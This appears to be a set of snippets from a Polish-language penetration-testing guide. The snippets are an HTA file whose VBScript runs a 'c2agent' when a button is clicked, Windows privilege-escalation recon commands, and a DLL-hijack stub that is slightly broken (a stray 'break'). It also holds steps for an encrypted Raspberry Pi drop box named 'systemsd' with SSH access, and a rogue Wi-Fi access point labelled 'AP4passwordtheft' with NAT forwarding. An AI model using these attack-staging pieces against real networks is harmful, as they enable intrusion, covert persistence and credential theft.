<head>
<title>Test HTA</title>
<HTA:APPLICATION
    APPLICATIONNAME="HTA Test"
    SCROLL="yes"
    SINGLEINSTANCE="yes"
    WINDOWSTATE="maximize"
>
</head>

<script language="VBScript">
    Sub TestSub
    Dim objShell, objCmdExec
        Set objShell = CreateObject("WScript.Shell")
        Set objCmdExec = objshell.exec("c2agent")
        getCommandOutput = objCmdExec.StdOut.ReadAll
    End Sub
</script>

<body>
<input type="button" value="Uruchom skrypt " name="run_button" onClick="TestSub">
<p>
</body>
---

~/Windows-Exploit-Suggester# ./windows-exploit-suggester.py --database 2016-06-07-mssb.xls --systeminfo comp_host1.txt
---

schtasks /query /fo LIST /v
---

tasklist.exe /FI "username eq system" /v
---

#include <windows.h>
#include <stdio.h>

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
{
printf("Ten napis zostanie wydrukowany w konsoli po zakończeniu importu pliku DLL.\n");
break;
}
---

$ sudo passwd
$ sudo apt-get update
$ sudo apt-get dist-upgrade
$ sudo apt-get install cryptsetup
$ sudo apt-get install lvm2
$ sudo apt-get install dcfldd
$ sudo apt-get install openssh-server
$ sudo update-rc.d -f ssh remove
$ sudo update-rc.d -f ssh defaults
$ sudo echo systemsd > /etc/hostname
$ sudo /etc/init.d/hostname.sh start
$ sudo reboot

$ sudo mkinitramfs -o /boot/initramfs.gz
$ sudo nano /boot/config.txt
...
initramfs initramfs.gz followkernel
$ sudo shutdown -hP now

$ sudo mount /dev/sda2 /mnt/usb
$ sudo rsync -aAXv --exclude={"/dev/*","/proc/*","/sys/*","/tmp/*","/run/*","/mnt/*","/media/*","/lost+found"} /mnt/usb/ user@192.168.1.3:/home/wil/backup/root/
$ sudo umount /mnt/usb

$ mv /home/user/backup/root/home /home/user/backup/home
$ mkdir /home/user/backup/root/home

$ sudo dcfldd if=/dev/urandom of=/dev/sda2
$ sudo cryptsetup luksFormat --verify-passphrase /dev/sda2
$ sudo cryptsetup luksOpen /dev/sda2 crypt
$ sudo service lvm2 start
$ sudo pvcreate /dev/mapper/crypt
$ sudo vgcreate cvg /dev/mapper/crypt
$ sudo lvcreate -L 500M cvg -n swap
$ sudo lvcreate -L 4G cvg -n root
$ sudo lvcreate -l +100%FREE cvg -n home

$ sudo rsync -aAXv user@192.168.1.111:/home/user/backup/home/ /mnt/home/
$ sudo rsync -aAXv user@192.168.1.111:/home/user/backup/root/ /mnt/root/
$ sudo chown -R root:root /mnt/root

$ sudo nano /mnt/boot/cmdline.txt
    change root=/dev/mmcblk0p2 to root=/dev/mapper/cvg-root
    add cryptdevice=/dev/mmcblk0p2:crypt
$ sudo nano /mnt/root/etc/fstab
    change /dev/mmcblk0p2 to /dev/mapper/crypt
$ sudo nano /mnt/root/etc/crypttab
    crypt /dev/mmcblk0p2 none luks

$ sudo umount /mnt/boot
$ sudo umount /mnt/root
$ sudo umount /mnt/home
$ sudo service lvm2 stop
$ sudo shutdown -hP now

(initramfs) cryptsetup luksOpen /dev/mmcblk0p2 crypt
(initramfs) lvm
    lvm> lvscan
        inactive '/dev/cvg/swap' [500.00 MiB] inherit
        inactive '/dev/cvg/root' [4.00 GiB] inherit
        inactive '/dev/cvg/home' [2.85 GiB] inherit
    lvm> lvs
        LV   VG  Attr     LSize    Pool Origin Data% Move Log Copy% Convert
        home cvg -wi----- 2.85g
        root cvg -wi----- 4.00g
        swap cvg -wi----- 500.00m
    lvm> vgchange -a y
        3 logical volume(s) in volume group "cvg" now active
    lvm> lvscan
        ACTIVE '/dev/cvg/swap' [500.00 MiB] inherit
        ACTIVE '/dev/cvg/root' [4.00 GiB] inherit
        ACTIVE '/dev/cvg/home' [2.85 GiB] inherit
    lvm> lvs
        LV   VG  Attr     LSize     Pool Origin Data% Move Log Copy% Convert
        home cvg -wi-a--- 2.85g
        root cvg -wi-a--- 4.00g
        swap cvg -wi-a--- 500.00m
    lvm> quit
        Exiting.
(initramfs) exit

# nano /etc/fstab
    proc                   /proc   proc   defaults           0   0
    /dev/mmcblk0p1         /boot   vfat   defaults           0   0
    /dev/mapper/cvg-root   /       ext4   defaults,noatime   0   1
    /dev/mapper/cvg-home   /home   ext4   defaults           0   2
    /dev/mapper/cvg-swap   none    swap   sw                 0   0
# mkinitramfs -o /boot/initramfs.gz

# lvm
    lvm> lvs
        LV   VG  Attr     LSize     Pool Origin Data% Move Log Copy% Convert
        home cvg -wi-ao-- 2.85g
        root cvg -wi-ao-- 4.00g
        swap cvg -wi-ao-- 500.00m
    lvm> quit
# df -ah
    Filesystem            Size  Used  Avail  Use%  Mounted on
    rootfs                3.9G  2.5G   1.2G   68%  /
    sysfs                    0     0      0     -  /sys
    proc                     0     0      0     -  /proc
    udev                   10M     0    10M    0%  /dev
    devpts                   0     0      0     -  /dev/pts
    tmpfs                  93M  244K    93M    1%  /run
    /dev/mapper/cvg-root  3.9G  2.5G   1.2G   68%  /
    tmpfs                 5.0M     0   5.0M    0%  /run/lock
    tmpfs                 186M     0   186M    0%  /run/shm
    /dev/mmcblk0p1         56M   20M    37M   36%  /boot
    /dev/mapper/cvg-home  2.8G  6.1M   2.6G    1%  /home
# exit

# apt-get remove sudo
# apt-get install sudo
# reboot
---

sudo apt-get install bridge-utils

auto br0
iface br0 inet dhcp
bridge_ports eth0 eth1
bridge_stp on

sudo ifconfig up br0
---
sudo apt-get install hostapd isc-dhcp-server

sudo nano /etc/dhcp/dhcpd.conf

authoritative;

subnet 192.168.69.0 netmask 255.255.255.0 {
    range 192.168.69.10 192.168.69.50;
    option broadcast-address 192.168.69.255;
    option routers 192.168.69.1;
    default-lease-time 600;
    max-lease-time 7200;
}

sudo nano /etc/network/interfaces

iface wlan0 inet static
address 192.168.69.1
netmask 255.255.255.0

sudo nano /etc/hostapd/hostapd.conf

interface=wlan0
ssid=AP4passwordtheft
hw_mode=g
channel=6
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
wpa=2
wpa_passphrase=supersecretpassword
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP
rsn_pairwise=CCMP

sudo nano /etc/default/hostapd

DAEMON_CONF="/etc/hostapd/hostapd.conf"

sudo nano /etc/sysctl.conf

net.ipv4.ip_forward=1

sudo sh -c "echo 1 > /proc/sys/net/ipv4/ip_forward"

sudo iptables -t nat -A POSTROUTING -o ppp0 -j MASQUERADE
sudo iptables -A FORWARD -i ppp0 -o wlan0 -m state --state RELATED,ESTABLISHED -j ACCEPT
sudo iptables -A FORWARD -i wlan0 -o ppp0 -j ACCEPT

sudo sh -c "iptables-save > /etc/iptables.ipv4.nat"

sudo nano /etc/network/interfaces

up iptables-restore < /etc/iptables.ipv4.nat

sudo /usr/sbin/hostapd /etc/hostapd/hostapd.conf
---

